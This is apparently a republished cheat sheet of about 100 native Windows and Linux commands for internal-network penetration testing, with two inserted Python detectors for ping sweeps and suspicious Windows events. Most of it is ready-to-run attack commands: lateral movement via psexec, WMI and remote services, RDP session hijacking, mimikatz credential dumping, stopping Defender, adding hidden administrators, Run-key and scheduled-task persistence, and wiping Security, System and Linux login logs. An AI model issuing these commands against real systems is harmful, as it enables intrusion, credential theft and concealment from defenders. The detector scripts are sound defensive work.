100 Essential Commands for Internal Network Penetration Testing

This guide compiles 100 high‑frequency native commands for Windows and Linux that cover internal network reconnaissance, host discovery, lateral movement, privilege escalation, domain enumeration, file searching, log cleaning and persistence, providing a practical reference for security professionals conducting penetration tests.

Black & White Path

Windows internal information gathering

whoami – view current logged‑in user
whoami /priv – view current user privileges (privilege escalation clues)
whoami /all – view full SID, group and privilege information
hostname – view host name
systeminfo – system version, patches, architecture, domain info
systeminfo | findstr KB – quickly list installed patches
ipconfig /all – NIC, IP, gateway, DNS, domain membership
ipconfig /displaydns – view local DNS cache
ipconfig /flushdns – clear DNS cache
arp -a – view ARP table, discover live hosts on the same subnet
route print – view routing table, assess multiple NICs and internal subnets
netstat -ano – view all ports, connections and owning PID
netstat -ano | findstr ":3389" – filter Remote Desktop port status
net user – list local users
net localgroup – list local groups
net localgroup administrators – view local administrators
net config workstation – quickly determine domain membership
ver – quick view of OS version
wmic os get caption – clean output of OS version
wmic qfe list – list patches (cleaner than systeminfo)

Windows internal network scanning and port discovery

ping -n 1 -w 100 192.168.1.1 – single ping for quick host liveness
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | findstr TTL – native C‑class sweep
tracert -d <targetIP> – traceroute without DNS resolution (faster)
net view – view hosts in the same workgroup
net view /domain – view domains present in the internal network
net share – view local shared resources
dir \\127.0.0.1\C$ – test default administrative share (C$)
sc query – list all running services
sc query winrm – check WinRM remote management status
sc query termservice – check Remote Desktop service status
tasklist /svc – processes with associated service names
tasklist | findstr lsass.exe – locate LSASS PID
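The `for /L ... ping` sweep above touches every address of a /24 within seconds, which is exactly the pattern a defender can pull out of flow or firewall logs. The following detector is an added example (not from the original cheat sheet); it assumes a constructed, simplified log line format of `<ISO timestamp> <src_ip> <dst_ip> <proto>` and flags any source that reaches a threshold of distinct hosts in one /24 over ICMP inside a sliding time window.

```python
"""Detect a C-class ICMP sweep (the native `for /L` ping loop) in flow logs.

Added example, not part of the original cheat sheet. Log line format is a
constructed simplification: "<ISO timestamp> <src_ip> <dst_ip> <proto>".
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Constructed sample: 10.0.5.7 walks 192.168.1.1-40 in under a minute,
# while 10.0.5.9 only pings its gateway twice (benign).
SAMPLE_LOG = "\n".join(
    [f"2024-05-01T10:00:{i % 60:02d} 10.0.5.7 192.168.1.{i} icmp" for i in range(1, 41)]
    + ["2024-05-01T10:00:10 10.0.5.9 192.168.1.1 icmp",
       "2024-05-01T10:00:11 10.0.5.9 192.168.1.1 icmp"]
)

def parse_line(line):
    ts, src, dst, proto = line.split()
    return datetime.fromisoformat(ts), src, dst, proto

def detect_sweeps(log_text, threshold=20, window=timedelta(seconds=60)):
    """Return {src_ip: "x.y.z.0/24"} for every source that reached at least
    `threshold` distinct hosts of one /24 over ICMP within `window`."""
    events = defaultdict(list)                      # (src, /24) -> [(ts, dst)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto = parse_line(line)
        if proto != "icmp":
            continue
        net = ipaddress.ip_network(f"{dst}/24", strict=False)
        events[(src, str(net))].append((ts, dst))
    hits = {}
    for (src, net), evs in events.items():
        evs.sort()
        start, seen = 0, defaultdict(int)          # sliding window over evs
        for ts, dst in evs:
            seen[dst] += 1
            while ts - evs[start][0] > window:     # drop hosts that aged out
                old = evs[start][1]
                seen[old] -= 1
                if seen[old] == 0:
                    del seen[old]
                start += 1
            if len(seen) >= threshold:
                hits[src] = net
                break
    return hits

if __name__ == "__main__":
    print(detect_sweeps(SAMPLE_LOG))   # {'10.0.5.7': '192.168.1.0/24'}
```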

Windows lateral movement and remote execution

net use \\<IP>\ipc$ "password" /user:username – connect to IPC$ share
net use \\<IP>\C$ /user:DOMAIN\username password – mount remote C: drive
copy malware.exe \\<IP>\C$\Windows\Temp – upload file to remote host
psexec \\<IP> -u username -p password cmd – obtain remote shell (requires admin)
wmic /node:<IP> /user:username /password:password process call create "cmd.exe" – remote WMI execution
sc \\<IP> create servicename binPath= "cmd.exe /c <command>" – create remote service to run command
schtasks /create /s <IP> /u username /p password /tn taskname /tr <command> /sc once /st 00:00 – schedule remote task execution
qwinsta /server:<IP> – view remote login sessions
tscon <sessionID> /dest:console /server:<IP> – hijack remote desktop session
reg query \\<IP>\HKLM\SYSTEM – read remote registry
net start /domain – view services started in the domain
winrm quickconfig – quickly enable WinRM on the local machine
Enter-PSSession -ComputerName <IP> – PowerShell remote connection

Windows privilege escalation and credential harvesting

wmic product get name,version – list installed software (search for escalation binaries)
wmic service get name,startname – view service start accounts
icacls C:\windows\system32 – view directory ACLs
secedit /export /cfg C:\sec.cfg – export local security policy
net user username password /add – add local user
net localgroup administrators username /add – add user to local Administrators group
net localgroup "Remote Desktop Users" username /add – grant RDP rights
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f – enable RDP (3389); the key path contains a space and must be quoted
taskkill /f /im msmpeng.exe – force‑stop Windows Defender (requires admin)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit – dump credentials from memory (authorized use only)

Windows domain environment commands

net time /domain – get domain controller time, locate DC IP
nltest /dclist:domainname – list domain controllers
nltest /dsgetdc:domainname – retrieve domain controller details
net user /domain – list all domain users
net group /domain – list all domain groups
net group "Domain Admins" /domain – list domain admins
net group "Enterprise Admins" /domain – list enterprise admins
net group "Domain Computers" /domain – list domain computers
dsquery user – query domain users (AD environments)
dsquery computer – query domain computers
dsquery group – query domain groups
set user – quickly view USERDOMAIN to determine domain context
gpresult /r – view applied group policy
wmic ntdomain list full – retrieve full domain information
nslookup -type=SRV _ldap._tcp – locate LDAP service / domain controller

Linux internal network commands

id – current UID/GID/privileges
whoami – current user
uname -a – kernel version (escalation clue)
cat /etc/issue – OS version
cat /etc/passwd – local users
cat /etc/group – local groups
ifconfig or ip a – network interface IPs
route -n – routing table
arp -a – ARP cache
netstat -antlp – listening ports and owning processes
ps -ef – process list
find / -perm -u=s -type f 2>/dev/null – locate SUID binaries for privilege escalation
sudo -l – view sudo permissions
cat /etc/shadow – password hashes (requires root)
ssh user@IP – lateral movement via SSH

General internal operations: file search, cleanup, persistence

dir /s /b c:\*.txt | findstr password – Windows search for files containing passwords
find / -name "*.conf" -type f 2>/dev/null – Linux search for configuration files
find / -name "*.bak" -o -name "*.old" – locate backup files
del /f /s /q %windir%\prefetch\* – clear prefetch cache
del /f /s /q "%userprofile%\Recent\*" – clear recent file history
cls – clear CMD screen
history -c – clear Bash history
echo > /var/log/wtmp – clear Linux login logs
echo > /var/log/secure – clear SSH logs
schtasks /create /tn name /tr path /sc onstart /ru system – create auto‑run task for persistence
reg add HKLM...\Run /v name /t REG_SZ /d path /f – registry Run key persistence
at 12:00 shutdown /r /t 0 – schedule immediate reboot (testing)
wevtutil el – list Windows event logs
wevtutil cl System – clear System log
wevtutil cl Security – clear Security log
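Every command in the privilege escalation section (local user add, Administrators and Remote Desktop Users group adds, fDenyTSConnections) and in this cleanup/persistence section (Run key, schtasks, wevtutil cl) leaves a Windows event behind, so a single triage pass over event records covers both. The script below is an added example, not from the original cheat sheet; the event shape `{"channel", "id", "host", "data"}` is a constructed simplification of exported event data, and the event IDs it keys on are standard ones (Security 4720, 4732, 4698, 1102; System 104; Sysmon 13).

```python
# Triage Windows event records for the commands in the privilege escalation
# and cleanup/persistence sections above. Added example, not from the original
# cheat sheet. Event shape {"channel","id","host","data"} is a constructed
# simplification. IDs are standard: 4720 user created, 4732 member added to a
# local group, 4698 scheduled task created, 1102/104 Security/System log cleared,
# Sysmon 13 registry value set.

SAMPLE_EVENTS = [  # constructed sample, in the order the page's commands would run
    {"channel": "Security", "id": 4720, "host": "WS01", "data": {"TargetUserName": "svc_tmp", "SubjectUserName": "jdoe"}},
    {"channel": "Security", "id": 4732, "host": "WS01", "data": {"TargetUserName": "Administrators", "MemberName": "svc_tmp"}},
    {"channel": "Sysmon", "id": 13, "host": "WS01", "data": {"TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections", "Details": "DWORD (0x00000000)"}},
    {"channel": "Sysmon", "id": 13, "host": "WS01", "data": {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updater", "Details": r"C:\Users\Public\u.exe"}},
    {"channel": "Security", "id": 4698, "host": "WS01", "data": {"TaskName": r"\name", "SubjectUserName": "jdoe"}},
    {"channel": "Security", "id": 1102, "host": "WS01", "data": {"SubjectUserName": "jdoe"}},
    {"channel": "Security", "id": 4624, "host": "WS02", "data": {"TargetUserName": "alice"}},  # benign logon noise
]

PRIV_GROUPS = {"administrators", "remote desktop users"}

def classify(ev):
    """Return a finding label for one event, or None if it is not of interest."""
    ch, eid, d = ev["channel"], ev["id"], ev["data"]
    if (ch, eid) == ("Security", 4720):
        return f"local account created: {d['TargetUserName']} by {d['SubjectUserName']}"
    if (ch, eid) == ("Security", 4732) and d["TargetUserName"].lower() in PRIV_GROUPS:
        return f"{d['MemberName']} added to {d['TargetUserName']}"
    if (ch, eid) == ("Security", 4698):
        return f"scheduled task created: {d['TaskName']} by {d['SubjectUserName']}"
    if (ch, eid) in {("Security", 1102), ("System", 104)}:
        return f"{ch} log cleared by {d.get('SubjectUserName', '?')}"
    if (ch, eid) == ("Sysmon", 13):
        key = d["TargetObject"]
        if key.lower().endswith("fdenytsconnections") and "0x00000000" in d["Details"]:
            return "RDP enabled via fDenyTSConnections=0"
        if "\\currentversion\\run\\" in key.lower():
            value = key.rsplit("\\", 1)[-1]        # value name under the Run key
            return f"Run key persistence: {value} -> {d['Details']}"
    return None

def triage(events):
    """Group findings per host in event order; a log-clear that follows earlier
    findings on the same host is the strongest signal of this page's sequence."""
    findings = {}
    for ev in events:
        label = classify(ev)
        if label:
            findings.setdefault(ev["host"], []).append(label)
    return findings

if __name__ == "__main__":
    for host, labels in triage(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(labels))
```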

Source: HACK之道
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
